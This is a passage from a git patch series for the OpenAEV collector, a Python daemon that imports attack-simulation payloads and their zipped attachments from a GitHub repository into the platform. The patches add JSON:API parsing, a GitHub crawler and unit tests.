From d413379f91936d240c03bcffe1f16ce0d29ed2ac Mon Sep 17 00:00:00 2001 From: guzmud Date: Tue, 12 May 2026 17:01:09 +0200 Subject: [PATCH 01/13] [openaev] feat(collector): compatibility with new JSON:API format (#317) --- openaev/openaev/openaev_openaev.py | 328 ++++++++++++++++++++--------- openaev/pyproject.toml | 1 + 2 files changed, 234 insertions(+), 95 deletions(-) diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 1a12b1e3..0264cc36 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -2,6 +2,7 @@ import mimetypes import zipfile +import json_api_doc import requests from pyoaev.configuration import Configuration from pyoaev.daemons import CollectorDaemon @@ -20,6 +21,7 @@ def __init__( collector_type="openaev_openaev", ) self.session = requests.Session() + self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): """Create or get a tag and return its ID.""" @@ -31,115 +33,251 @@ def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): self.logger.warning(f"Failed to upsert tag {tag_name}: {e}") return None + def _process_payload_tags(self, payload): + tags_mapping = {} + payload_tags = payload.get("payload_tags", []) + for tag in payload_tags: + tag = { + key: value + for key, value in tag.items() + if key in ["tag_id", "tag_name", "tag_color"] + } + new_tag = self.api.tag.upsert(tag) + tags_mapping[tag["tag_id"]] = new_tag["tag_id"] + + new_tags = [ + tags_mapping[tag["tag_id"]] + for tag in payload_tags + if tag["tag_id"] in tags_mapping + ] + + # Add collector source tag + source_tag_name = "source:openaev-datasets" + source_tag_id = self._create_or_get_tag(source_tag_name, "#ef4444") # Red + if source_tag_id: + new_tags.append(source_tag_id) + + # Add native/community tag if applicable + if payload.get("native_collection", False): + native_tag_name = "type:native" + native_tag_id = self._create_or_get_tag(native_tag_name, "#10b981") # Green + if native_tag_id: + new_tags.append(native_tag_id) + + return tags_mapping, new_tags + + def _process_payload_attack_patterns(self, payload): + attack_patterns = payload.get("payload_attack_patterns", []) + + for idx in range(len(attack_patterns)): + if "id" in attack_patterns[idx]: + del attack_patterns[idx]["id"] + if "type" in attack_patterns[idx]: + del attack_patterns[idx]["type"] + + if len(attack_patterns) > 0: + self.api.attack_pattern.upsert(attack_patterns, True) + + attack_patterns = [ + attack["attack_pattern_external_id"] for attack in attack_patterns + ] + return attack_patterns + + def _process_document(self, payload, document_key, tags_mapping): + new_document = None + payload_document = payload.get(document_key, {}) + + if "id" in payload_document: + del payload_document["id"] + if "type" in payload_document: + del payload_document["type"] + if payload_document.get("document_tags", []): + if isinstance(payload_document[0], dict): + payload_document["document_tags"] = [ + tag["tag_id"] for tag in payload_document.get("document_tags", []) + ] + + if payload_document.get("document_path", ""): + # Upload the document + payload_document["document_tags"] = [ + tags_mapping[tag_id] + for tag_id in payload_document.get("document_tags", []) + if tag_id in tags_mapping + ] + + zip_url = self.openaev_url_prefix + payload_document["document_path"] + zip_response = self.session.get(zip_url) + zip_response.raise_for_status() + # could using ziphyr be more efficient here? + with io.BytesIO(zip_response.content) as zip_buffer: + with zipfile.ZipFile(zip_buffer) as z: + file_names = z.namelist() + if not file_names: + raise Exception(f"No file found in zip at {zip_url}") + file_name = file_names[0] + with z.open(file_name, pwd=b"infected") as unzipped_file: + file_content = unzipped_file.read() + mime_type, _ = mimetypes.guess_type( + payload_document["document_name"] + ) + if mime_type is None: + mime_type = "application/octet-stream" + file_handle = io.BytesIO(file_content) + file = ( + payload_document["document_name"], + file_handle, + mime_type, + ) + new_document = self.api.document.upsert( + document=payload_document, file=file + ) + + return payload_document, new_document + + def _is_valid_json_api(self, payload): + """check if the JSON data is in the JSON:API format""" + return "data" in payload.keys() + + def _is_valid_json_flat(self, payload): + """check if the JSON data is in the legacy flat JSON payload format""" + return "payload_information" in payload.keys() + + def _process_jsonapi_payload(self, payload): + """processing a single JSON:API payload""" + flat_payload = json_api_doc.deserialize(payload) + self.logger.info("Importing payload " + flat_payload["payload_name"]) + + # Create tags + tags_mapping, new_tags = self._process_payload_tags(flat_payload) + flat_payload["payload_tags"] = new_tags + + # Create attack patterns + payload_attack_patterns = self._process_payload_attack_patterns(flat_payload) + flat_payload["payload_attack_patterns"] = payload_attack_patterns + + # Create document + file_key = "payload_document" + file_lookup = [ + key + for key in flat_payload + if isinstance(flat_payload[key], dict) + and flat_payload[key].get("type") == "documents" + ] + if len(file_lookup) > 1: + self.logger.warning( + "Warning, more than one file detected as attachment, fallback to first found" + ) + if file_lookup: + file_key = file_lookup[0] + + payload_document, new_document = self._process_document( + flat_payload, file_key, tags_mapping + ) + + if file_lookup: + del flat_payload[file_key] + flat_payload["payload_document"] = payload_document + + for key in ["executable_file", "file_drop_file"]: + if key in flat_payload and new_document is not None: + flat_payload[key] = new_document["document_id"] + + # align flat JSON:API with legacy flat JSON (domains) + flat_payload["payload_domains"] = [ + { + "domain_name": domain["domain_name"], + "domain_color": domain["domain_color"], + } + for domain in flat_payload.get("payload_domains", []) + ] + + # align flat JSON:API with legacy flat JSON (external ID) + if ( + "payload_external_id" not in flat_payload + or flat_payload["payload_external_id"] is None + ): + flat_payload["payload_external_id"] = flat_payload["payload_id"] + + # align flat JSON:API with legacy flat JSON (leftovers) + for key in [ + "id", + "type", + "payload_id", + "payload_collector", + "payload_collector_type", + ]: + if key in flat_payload: + del flat_payload[key] + + # Upsert payload + flat_payload["payload_collector"] = self._configuration.get("collector_id") + self.api.payload.upsert(flat_payload) + self.logger.info("Payload " + flat_payload["payload_name"] + " imported") + + return flat_payload["payload_external_id"] + + def _process_jsonflat_payload(self, payload): + """processing a single legacy flat JSON payload""" + payload_information = payload.get("payload_information") + self.logger.info("Importing payload " + payload_information["payload_name"]) + + # Create tags + tags_mapping, new_tags = self._process_payload_tags(payload) + payload_information["payload_tags"] = new_tags + + # Create attack patterns + payload_attack_patterns = self._process_payload_attack_patterns(payload) + payload_information["payload_attack_patterns"] = payload_attack_patterns + + # Create document + file_key = "payload_document" + payload_document, new_document = self._process_document( + payload, file_key, tags_mapping + ) + + for key in ["executable_file", "file_drop_file"]: + if key in payload_information and new_document is not None: + payload_information[key] = new_document["document_id"] + + # Upsert payload + payload_information["payload_collector"] = self._configuration.get( + "collector_id" + ) + self.api.payload.upsert(payload_information) + self.logger.info("Payload " + payload_information["payload_name"] + " imported") + + return payload_information["payload_external_id"] + + def _process_single_payload(self, payload): + if self._is_valid_json_api(payload): # new format + return self._process_jsonapi_payload(payload) + if self._is_valid_json_flat(payload): # legacy format + return self._process_jsonflat_payload(payload) + + self.logger.warning( + "Skipping a payload that didn't match JSON:API format nor flat legacy format" + ) # should it be a logger.error / a raise Exception? + return + def _process_message(self) -> None: openaev_import_only_native = self._configuration.get( "openaev_import_only_native" ) - openaev_url_prefix = self._configuration.get("openaev_url_prefix") - response = self.session.get(url=openaev_url_prefix + "manifest.json") + # unsure if the prefix needs to be refreshed to follow hot changes in the configuration + self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") + response = self.session.get(url=self.openaev_url_prefix + "manifest.json") payloads = response.json() payload_external_ids = [] for payload in payloads: - # Only native, continue if openaev_import_only_native and ( "native_collection" not in payload or not payload["native_collection"] ): continue - payload_information = payload.get("payload_information") - self.logger.info("Importing payload " + payload_information["payload_name"]) - - # Create tags - tags_mapping = {} - tags = payload.get("payload_tags", []) - for tag in tags: - new_tag = self.api.tag.upsert(tag) - tags_mapping[tag["tag_id"]] = new_tag["tag_id"] - - # Create attack patterns - attack_patterns = payload.get("payload_attack_patterns", []) - if len(attack_patterns) > 0: - self.api.attack_pattern.upsert(attack_patterns, True) - - # Create document - new_document = None - document = payload.get("payload_document", None) - if document is not None and "document_path" in document: - # Upload the document - new_tags = [] - for tag_id in document.get("document_tags", []): - if tag_id in tags_mapping: - new_tags.append(tags_mapping[tag_id]) - document["document_tags"] = new_tags - - zip_url = openaev_url_prefix + document["document_path"] - zip_response = self.session.get(zip_url) - zip_response.raise_for_status() - with io.BytesIO(zip_response.content) as zip_buffer: - with zipfile.ZipFile(zip_buffer) as z: - file_names = z.namelist() - if not file_names: - raise Exception(f"No file found in zip at {zip_url}") - file_name = file_names[0] - with z.open(file_name, pwd=b"infected") as unzipped_file: - file_content = unzipped_file.read() - mime_type, _ = mimetypes.guess_type( - document["document_name"] - ) - if mime_type is None: - mime_type = "application/octet-stream" - file_handle = io.BytesIO(file_content) - file = (document["document_name"], file_handle, mime_type) - new_document = self.api.document.upsert( - document=document, file=file - ) - - # Upsert payload - payload_information["payload_collector"] = self._configuration.get( - "collector_id" - ) - - new_tags = [] - for tag_id in payload_information.get("payload_tags", []): - if tag_id in tags_mapping: - new_tags.append(tags_mapping[tag_id]) - - # Add collector source tag - source_tag_name = "source:openaev-datasets" - source_tag_id = self._create_or_get_tag(source_tag_name, "#ef4444") # Red - if source_tag_id: - new_tags.append(source_tag_id) - - # Add native/community tag if applicable - if payload.get("native_collection", False): - native_tag_name = "type:native" - native_tag_id = self._create_or_get_tag( - native_tag_name, "#10b981" - ) # Green - if native_tag_id: - new_tags.append(native_tag_id) - - payload_information["payload_tags"] = new_tags - - new_attack_patterns = [] - for attack_pattern in payload_information.get( - "payload_attack_patterns", [] - ): - new_attack_patterns.append(attack_pattern["attack_pattern_external_id"]) - payload_information["payload_attack_patterns"] = new_attack_patterns - - if "executable_file" in payload_information and new_document is not None: - payload_information["executable_file"] = new_document["document_id"] - elif "file_drop_file" in payload_information and new_document is not None: - payload_information["file_drop_file"] = new_document["document_id"] - - self.api.payload.upsert(payload_information) - payload_external_ids.append(payload_information["payload_external_id"]) - self.logger.info( - "Payload " + payload_information["payload_name"] + " imported" - ) + payload_external_id = self._process_single_payload(payload) + payload_external_ids.append(payload_external_id) self.api.payload.deprecate( { diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index e979cf00..6a520262 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -15,6 +15,7 @@ pyoaev = [ { markers = "extra == 'prod' and extra != 'dev'", version = "2.260525.0", source = "pypi" }, { markers = "extra == 'dev' and extra != 'prod'", path = "../../client-python", develop = true }, ] +json-api-doc = "^0.15.0" [tool.poetry.extras] prod = ["pyoaev"] From 9a6a65a715d9fa690ad71bdaacbd97b2d7654151 Mon Sep 17 00:00:00 2001 From: guzmud Date: Tue, 19 May 2026 10:28:10 +0200 Subject: [PATCH 02/13] [openaev] test(collector): adding tests to the openaev collector --- openaev/openaev/openaev_openaev.py | 5 +- openaev/tests/test_openaev_openaev.py | 202 ++++++++++++++++++++++++++ 2 files changed, 206 insertions(+), 1 deletion(-) create mode 100644 openaev/tests/test_openaev_openaev.py diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 0264cc36..4b219241 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -92,7 +92,9 @@ def _process_document(self, payload, document_key, tags_mapping): if "type" in payload_document: del payload_document["type"] if payload_document.get("document_tags", []): - if isinstance(payload_document[0], dict): + if payload_document["document_tags"] and isinstance( + payload_document["document_tags"][0], dict + ): payload_document["document_tags"] = [ tag["tag_id"] for tag in payload_document.get("document_tags", []) ] @@ -265,6 +267,7 @@ def _process_message(self) -> None: ) # unsure if the prefix needs to be refreshed to follow hot changes in the configuration self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") + # TODO cookie-less session + retry mechanism + url builder using urllib.urlparse response = self.session.get(url=self.openaev_url_prefix + "manifest.json") payloads = response.json() payload_external_ids = [] diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/test_openaev_openaev.py new file mode 100644 index 00000000..41830749 --- /dev/null +++ b/openaev/tests/test_openaev_openaev.py @@ -0,0 +1,202 @@ +import unittest +from unittest.mock import MagicMock, patch, sentinel + +import openaev.openaev_openaev as module + +daemon_config_data = { + "openaev_url": "http://fake.url", + "openaev_token": "my_awesome_token", + "openaev_url_prefix": "https://fake.url/other/", +} + + +class TestOpenAEVOpenAEV(unittest.TestCase): + def test_openaev_collector_init(self): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + self.assertIsInstance(collector.session, module.requests.Session) + self.assertEqual( + collector.openaev_url_prefix, daemon_config_data["openaev_url_prefix"] + ) + + def test_openaev_collector_create_or_get_tag(self): + api = MagicMock() + api.tag.upsert.return_value = { + "tag_id": sentinel.tag_id, + } + tag_name = "my tag" + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + tag_id = collector._create_or_get_tag(tag_name) + + api.tag.upsert.assert_called_with( + {"tag_name": tag_name, "tag_color": "#6b7280"} + ) + self.assertEqual(tag_id, sentinel.tag_id) + + tag_color = "#123456" + tag_id = collector._create_or_get_tag(tag_name, tag_color) + + api.tag.upsert.assert_called_with( + {"tag_name": tag_name, "tag_color": tag_color} + ) + self.assertEqual(tag_id, sentinel.tag_id) + + api.tag.upsert.side_effect = Exception("failure") + logger = MagicMock() + collector.logger = logger + + tag_id = collector._create_or_get_tag(tag_name, tag_color) + + logger.warning.assert_called_with("Failed to upsert tag my tag: failure") + self.assertIsNone(tag_id) + + @patch.object(module.OpenAEVOpenAEV, "_create_or_get_tag") + def test_openaev_collector_process_payload_tags(self, m_create_or_get_tag): + _configuration = daemon_config_data + api = MagicMock() + api.tag.upsert.side_effect = [ + {"tag_id": "id_1"}, + {"tag_id": "id_2"}, + ] + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + m_create_or_get_tag.side_effect = [ + "id_3", + "id_4", + ] + + payload = { + "native_collection": True, + "payload_tags": [ + { + "tag_id": "1", + "tag_name": "first", + "tag_color": "#123456", + "foo": "bar", + }, + { + "tag_id": "2", + "tag_name": "second", + "tag_color": "#098765", + "dead": "beef", + }, + ], + } + + tags_mapping, new_tags = collector._process_payload_tags(payload) + + api.tag.upsert.assert_any_call( + {"tag_id": "1", "tag_name": "first", "tag_color": "#123456"}, + ) + api.tag.upsert.assert_called_with( + {"tag_id": "2", "tag_name": "second", "tag_color": "#098765"}, + ) + m_create_or_get_tag.assert_any_call("source:openaev-datasets", "#ef4444") + m_create_or_get_tag.assert_called_with("type:native", "#10b981") + self.assertEqual( + tags_mapping, + { + "1": "id_1", + "2": "id_2", + }, + ) + self.assertEqual( + new_tags, + [ + "id_1", + "id_2", + "id_3", + "id_4", + ], + ) + + def test_openaev_collector_process_payload_attack_patterns(self): + _configuration = daemon_config_data + api = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + payload = { + "payload_attack_patterns": [ + { + "attack_pattern_external_id": "foobar", + "dead": "beef", + "id": "1", + "type": "attack_pattern", + } + ] + } + + attack_patterns = collector._process_payload_attack_patterns(payload) + + api.attack_pattern.upsert.assert_called_with( + [{"attack_pattern_external_id": "foobar", "dead": "beef"}], True + ) + self.assertEqual(attack_patterns, ["foobar"]) + + @patch.object(module.zipfile, "ZipFile") + @patch.object(module.io, "BytesIO") + def test_openaev_collector_process_documents(self, m_bytesio, m_zipfile): + _configuration = daemon_config_data + api = MagicMock() + session = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + collector.session = session + + document_key = "my document key" + payload = { + "my document key": { + "id": "leftover-id", + "type": "documents", + "document_tags": [{"tag_id": "tag1"}], + "document_name": "path.file", + } + } + tags_mapping = {"tag1": {"key": "value"}} + + payload_document, new_document = collector._process_document( + payload, document_key, tags_mapping + ) + + def test_openaev_collector_is_valid_json_api(self): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + flag = collector._is_valid_json_api({"data": None}) + self.assertTrue(flag) + flag = collector._is_valid_json_api({"payload_information": None}) + self.assertFalse(flag) + + def test_openaev_collector_is_valid_json_flat(self): + _configuration = daemon_config_data + + collector = module.OpenAEVOpenAEV(_configuration) + + flag = collector._is_valid_json_flat({"payload_information": None}) + self.assertTrue(flag) + flag = collector._is_valid_json_flat({"data": None}) + self.assertFalse(flag) + + def test_openaev_collector_process_jsonapi_payload(self): + pass + + def test_openaev_collector_process_jsonflat_payload(self): + pass + + def test_openaev_collector_process_single_payload(self): + pass + + def test_openaev_collector_process_message(self): + pass From 93cb7fbc5bc6f67da42e698bae724b5d8753a6a0 Mon Sep 17 00:00:00 2001 From: guzmud Date: Tue, 19 May 2026 17:07:02 +0200 Subject: [PATCH 03/13] [openaev] feat(collector): adding a github crawler to stop relying on manifest.json --- openaev/openaev/github_crawler.py | 54 +++++++++++++++++ openaev/pyproject.toml | 2 + openaev/tests/test_github_crawler.py | 87 ++++++++++++++++++++++++++++ 3 files changed, 143 insertions(+) create mode 100644 openaev/openaev/github_crawler.py create mode 100644 openaev/tests/test_github_crawler.py diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py new file mode 100644 index 00000000..3ed8be96 --- /dev/null +++ b/openaev/openaev/github_crawler.py @@ -0,0 +1,54 @@ +from urllib.parse import urlparse + +import requests +from github import Github + + +def extract_from_url_prefix(url_prefix): + """convert the previously used url_prefix format to the new repo and ref format""" + parsed_url = urlparse(url_prefix) + path = parsed_url.path + repo, ref = path.rstrip("/").lstrip("/").split("/refs/") + return repo, ref + + +class GithubCrawler: + def __init__(self, repo_name, ref_value): + self.repo_name = repo_name + self.ref_value = ref_value + + self.github_client = Github() + self.repo = self.github_client.get_repo(self.repo_name) + self.ref = self.github_client.get_git_ref(self.ref_value) + + def get_json_file_paths(self): + tree_url = self.repo.trees_url + tree_url = tree_url.replace("{/sha}", f"/{self.ref.object.sha}") + tree_url += "?recursive=true" + + tree_data = requests.get(tree_url).json()["tree"] + + json_file_paths = [ + element["path"] + for element in tree_data + if element["path"].endswith(".json") + and element["path"] != "manifest.json" + and not element["path"].startswith(".") + ] + return json_file_paths + + def get_attachment_filepaths(self, json_file_path): + parent_path = "/".join(json_file_path.rsplit("/")[:-1]) + folder_content = self.repo.get_contents(parent_path) + attachment_filepaths = [ + contentfile.path + for contentfile in folder_content + if contentfile.path != json_file_path + ] + return attachment_filepaths + + def get_attachment_download_url(self, attachment_filepath): + content = self.repo.get_contents(attachment_filepath) + # content.url for API url + # content.content for the actual data + return content.download_url diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index 6a520262..2635ab7e 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -16,6 +16,8 @@ pyoaev = [ { markers = "extra == 'dev' and extra != 'prod'", path = "../../client-python", develop = true }, ] json-api-doc = "^0.15.0" +pygithub = "^2.9.1" +requests = "<2.34" [tool.poetry.extras] prod = ["pyoaev"] diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py new file mode 100644 index 00000000..326964a5 --- /dev/null +++ b/openaev/tests/test_github_crawler.py @@ -0,0 +1,87 @@ +import unittest +from unittest.mock import MagicMock, patch, sentinel + +import openaev.github_crawler as module + + +@patch.object(module, "Github") +class TestGithubCrawler(unittest.TestCase): + def test_github_crawler_init(self, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + + crawler = module.GithubCrawler(repo_name, ref_value) + + self.assertEqual(crawler.repo_name, sentinel.repo_name) + self.assertEqual(crawler.ref_value, sentinel.ref_value) + self.assertEqual(crawler.github_client, m_github.return_value) + self.assertEqual(crawler.repo, m_github.return_value.get_repo.return_value) + self.assertEqual(crawler.ref, m_github.return_value.get_git_ref.return_value) + m_github.return_value.get_repo.assert_called_with(sentinel.repo_name) + m_github.return_value.get_git_ref.assert_called_with(sentinel.ref_value) + + @patch.object(module, "requests") + def test_get_json_file_paths(self, m_requests, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + m_github.return_value.get_repo.return_value.trees_url = ( + "https://dead/beef{/sha}" + ) + m_github.return_value.get_git_ref.return_value.object.sha = "feedc0de" + m_requests.get.return_value.json.return_value = { + "tree": [ + {"path": "manifest.json"}, + {"path": ".secrets/data.json"}, + {"path": "malware/malicious/evil/payload.json"}, + {"path": "malware/not-a-json.doc"}, + ] + } + + crawler = module.GithubCrawler(repo_name, ref_value) + + json_file_paths = crawler.get_json_file_paths() + + m_requests.get.assert_called_with("https://dead/beef/feedc0de?recursive=true") + self.assertEqual(json_file_paths, ["malware/malicious/evil/payload.json"]) + + def test_get_attachment_filepaths(self, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + contentfile1 = MagicMock() + contentfile1.path = "malware/malicious/evil/payload.json" + contentfile2 = MagicMock() + contentfile2.path = "malware/malicious/evil/legit_document.docx" + m_github.return_value.get_repo.return_value.get_contents.return_value = [ + contentfile1, + contentfile2, + ] + + crawler = module.GithubCrawler(repo_name, ref_value) + + json_file_path = "malware/malicious/evil/payload.json" + + attachment_filepaths = crawler.get_attachment_filepaths(json_file_path) + + m_github.return_value.get_repo.return_value.get_contents.assert_called_with( + "malware/malicious/evil" + ) + self.assertEqual( + attachment_filepaths, ["malware/malicious/evil/legit_document.docx"] + ) + + def test_get_attachment_download_url(self, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + content = MagicMock() + content.download_url = sentinel.download_url + m_github.return_value.get_repo.return_value.get_contents.return_value = content + + crawler = module.GithubCrawler(repo_name, ref_value) + + attachment_filepath = "malware/malicious/evil/legit_document.docx" + download_url = crawler.get_attachment_download_url(attachment_filepath) + + m_github.return_value.get_repo.return_value.get_contents.assert_called_with( + attachment_filepath + ) + self.assertEqual(download_url, sentinel.download_url) From 2b7cdedf12851a4ecfc927b611535202ec14e70a Mon Sep 17 00:00:00 2001 From: guzmud Date: Wed, 20 May 2026 10:34:01 +0200 Subject: [PATCH 04/13] [openaev] test(collector): completing the unit test base --- openaev/openaev/github_crawler.py | 2 +- openaev/tests/test_github_crawler.py | 17 ++++++++++++++--- openaev/tests/test_openaev_openaev.py | 15 +++++++++++++-- 3 files changed, 28 insertions(+), 6 deletions(-) diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py index 3ed8be96..edd45e74 100644 --- a/openaev/openaev/github_crawler.py +++ b/openaev/openaev/github_crawler.py @@ -19,7 +19,7 @@ def __init__(self, repo_name, ref_value): self.github_client = Github() self.repo = self.github_client.get_repo(self.repo_name) - self.ref = self.github_client.get_git_ref(self.ref_value) + self.ref = self.repo.get_git_ref(self.ref_value) def get_json_file_paths(self): tree_url = self.repo.trees_url diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py index 326964a5..2b5be401 100644 --- a/openaev/tests/test_github_crawler.py +++ b/openaev/tests/test_github_crawler.py @@ -4,6 +4,17 @@ import openaev.github_crawler as module +def test_extract_from_url_prefix(): + default_url_prefix = ( + "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/" + ) + + repo, ref = module.extract_from_url_prefix(default_url_prefix) + + assert repo == "OpenAEV-Platform/payloads" + assert ref == "heads/main" + + @patch.object(module, "Github") class TestGithubCrawler(unittest.TestCase): def test_github_crawler_init(self, m_github): @@ -16,9 +27,9 @@ def test_github_crawler_init(self, m_github): self.assertEqual(crawler.ref_value, sentinel.ref_value) self.assertEqual(crawler.github_client, m_github.return_value) self.assertEqual(crawler.repo, m_github.return_value.get_repo.return_value) - self.assertEqual(crawler.ref, m_github.return_value.get_git_ref.return_value) + self.assertEqual(crawler.ref, m_github.return_value.get_repo.return_value.get_git_ref.return_value) m_github.return_value.get_repo.assert_called_with(sentinel.repo_name) - m_github.return_value.get_git_ref.assert_called_with(sentinel.ref_value) + m_github.return_value.get_repo.return_value.get_git_ref.assert_called_with(sentinel.ref_value) @patch.object(module, "requests") def test_get_json_file_paths(self, m_requests, m_github): @@ -27,7 +38,7 @@ def test_get_json_file_paths(self, m_requests, m_github): m_github.return_value.get_repo.return_value.trees_url = ( "https://dead/beef{/sha}" ) - m_github.return_value.get_git_ref.return_value.object.sha = "feedc0de" + m_github.return_value.get_repo.return_value.get_git_ref.return_value.object.sha = "feedc0de" m_requests.get.return_value.json.return_value = { "tree": [ {"path": "manifest.json"}, diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/test_openaev_openaev.py index 41830749..8ef13780 100644 --- a/openaev/tests/test_openaev_openaev.py +++ b/openaev/tests/test_openaev_openaev.py @@ -6,7 +6,7 @@ daemon_config_data = { "openaev_url": "http://fake.url", "openaev_token": "my_awesome_token", - "openaev_url_prefix": "https://fake.url/other/", + "openaev_url_prefix": "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/", } @@ -195,7 +195,18 @@ def test_openaev_collector_process_jsonapi_payload(self): def test_openaev_collector_process_jsonflat_payload(self): pass - def test_openaev_collector_process_single_payload(self): + @patch.object(module.OpenAEVOpenAEV, "_process_jsonapi_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_api") + def test_openaev_collector_process_single_payload_jsonapi_case( + self, m_is_valid_json_api, m_process_jsonapi_payload + ): + pass + + @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") + def test_openaev_collector_process_single_payload_jsonflat_case( + self, m_is_valid_json_flat, m_process_jsonflat_payload + ): pass def test_openaev_collector_process_message(self): From a0f098a91143a07166f56538464899a1ebb523b5 Mon Sep 17 00:00:00 2001 From: guzmud Date: Wed, 20 May 2026 15:35:34 +0200 Subject: [PATCH 05/13] [openaev] feat(gitcrawler): add get_json to GithubCrawler --- openaev/openaev/github_crawler.py | 7 +++++++ openaev/pyproject.toml | 3 ++- openaev/tests/test_github_crawler.py | 21 +++++++++++++++++++++ 3 files changed, 30 insertions(+), 1 deletion(-) diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py index edd45e74..1492d051 100644 --- a/openaev/openaev/github_crawler.py +++ b/openaev/openaev/github_crawler.py @@ -1,5 +1,7 @@ +from base64 import b64decode from urllib.parse import urlparse +import orjson import requests from github import Github @@ -37,6 +39,11 @@ def get_json_file_paths(self): ] return json_file_paths + def get_json(self, json_file_path): + content = self.repo.get_contents(json_file_path) + data = orjson.loads(b64decode(content.content)) + return data + def get_attachment_filepaths(self, json_file_path): parent_path = "/".join(json_file_path.rsplit("/")[:-1]) folder_content = self.repo.get_contents(parent_path) diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index 2635ab7e..e3e0ed8a 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -17,7 +17,8 @@ pyoaev = [ ] json-api-doc = "^0.15.0" pygithub = "^2.9.1" -requests = "<2.34" +requests = ">=2.33.0,<2.34.0" +orjson = "^3.11.9" [tool.poetry.extras] prod = ["pyoaev"] diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py index 2b5be401..b360c6a0 100644 --- a/openaev/tests/test_github_crawler.py +++ b/openaev/tests/test_github_crawler.py @@ -55,6 +55,27 @@ def test_get_json_file_paths(self, m_requests, m_github): m_requests.get.assert_called_with("https://dead/beef/feedc0de?recursive=true") self.assertEqual(json_file_paths, ["malware/malicious/evil/payload.json"]) + @patch.object(module, "b64decode") + @patch.object(module, "orjson") + def test_get_json(self, m_orjson, m_b64decode, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + content = MagicMock() + m_github.return_value.get_repo.return_value.get_contents.return_value = content + + crawler = module.GithubCrawler(repo_name, ref_value) + + json_file_path = "malware/malicious/evil/payload.json" + + data = crawler.get_json(json_file_path) + + m_github.return_value.get_repo.return_value.get_contents.assert_called_with( + "malware/malicious/evil/payload.json" + ) + m_b64decode.assert_called_with(content.content) + m_orjson.loads.assert_called_with(m_b64decode.return_value) + self.assertEqual(data, m_orjson.loads.return_value) + def test_get_attachment_filepaths(self, m_github): repo_name = sentinel.repo_name ref_value = sentinel.ref_value From 669ec1e2a5e79ec53cda8730f4c0ecb696081d40 Mon Sep 17 00:00:00 2001 From: guzmud Date: Wed, 20 May 2026 16:57:43 +0200 Subject: [PATCH 06/13] [openaev] feat(collector): integrate GithubCrawler into the collector --- openaev/openaev/openaev_openaev.py | 37 ++-- openaev/tests/test_github_crawler.py | 13 +- openaev/tests/test_openaev_openaev.py | 237 ++++++++++++++++++++++++-- 3 files changed, 249 insertions(+), 38 deletions(-) diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 4b219241..fbc30d96 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -8,6 +8,7 @@ from pyoaev.daemons import CollectorDaemon from openaev.configuration.config_loader import ConfigLoader +from openaev.github_crawler import GithubCrawler, extract_from_url_prefix class OpenAEVOpenAEV(CollectorDaemon): @@ -22,6 +23,8 @@ def __init__( ) self.session = requests.Session() self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") + repo_name, ref_value = extract_from_url_prefix(self.openaev_url_prefix) + self.github_crawler = GithubCrawler(repo_name, ref_value) def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): """Create or get a tag and return its ID.""" @@ -107,6 +110,7 @@ def _process_document(self, payload, document_key, tags_mapping): if tag_id in tags_mapping ] + # TODO use url builder from urllib.parse zip_url = self.openaev_url_prefix + payload_document["document_path"] zip_response = self.session.get(zip_url) zip_response.raise_for_status() @@ -250,7 +254,16 @@ def _process_jsonflat_payload(self, payload): return payload_information["payload_external_id"] - def _process_single_payload(self, payload): + def _process_single_payload(self, payload_path): + payload = self.github_crawler.get_json(payload_path) + + openaev_import_only_native = self._configuration.get( + "openaev_import_only_native" + ) + if openaev_import_only_native and ( + "native_collection" not in payload or not payload["native_collection"] + ): + return if self._is_valid_json_api(payload): # new format return self._process_jsonapi_payload(payload) if self._is_valid_json_flat(payload): # legacy format @@ -262,25 +275,13 @@ def _process_single_payload(self, payload): return def _process_message(self) -> None: - openaev_import_only_native = self._configuration.get( - 